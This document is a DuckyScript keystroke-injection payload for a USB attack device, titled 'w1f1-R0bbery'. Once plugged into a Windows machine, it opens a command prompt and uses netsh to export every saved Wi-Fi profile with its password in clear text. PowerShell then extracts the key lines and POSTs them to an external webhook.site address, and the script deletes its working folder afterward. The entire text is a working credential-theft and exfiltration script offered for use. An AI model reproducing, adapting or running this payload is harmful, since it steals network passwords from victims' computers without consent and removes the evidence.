REM #w1f1-R0bbery
REM #CODED BY KRYPT0n
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING mkdir
SPACE
STRING p@ssw0rd
ENTER
STRING cd
SPACE
STRING p@ssw0rd
ENTER
STRING netsh
SPACE
STRING wlan
SPACE
STRING export
SPACE
STRING profile
SPACE
STRING key=clear
ENTER
DELAY 500
REM ###############
STRING powershell
SPACE
STRING Select-String
SPACE
STRING -Path
SPACE
STRING Wi*.xml
SPACE
STRING -Pattern
SPACE
STRING 'keyMaterial'
SPACE
STRING >
SPACE
STRING wifi-pass
ENTER
DELAY 500
STRING powershell
SPACE
STRING Invoke-WebRequest
SPACE
STRING -Uri
SPACE
REM #replace following link
STRING https://webhook.site/a90e4d9f-2322-470e-9286-4280554f3f82
SPACE
STRING -Method
SPACE
STRING POST
SPACE
STRING -InFile
SPACE
STRING wifi-pass
SPACE
ENTER
STRING cd
SPACE
STRING ..
ENTER
STRING rmdir
SPACE
STRING p@ssw0rd
ENTER
STRING exit
ENTER
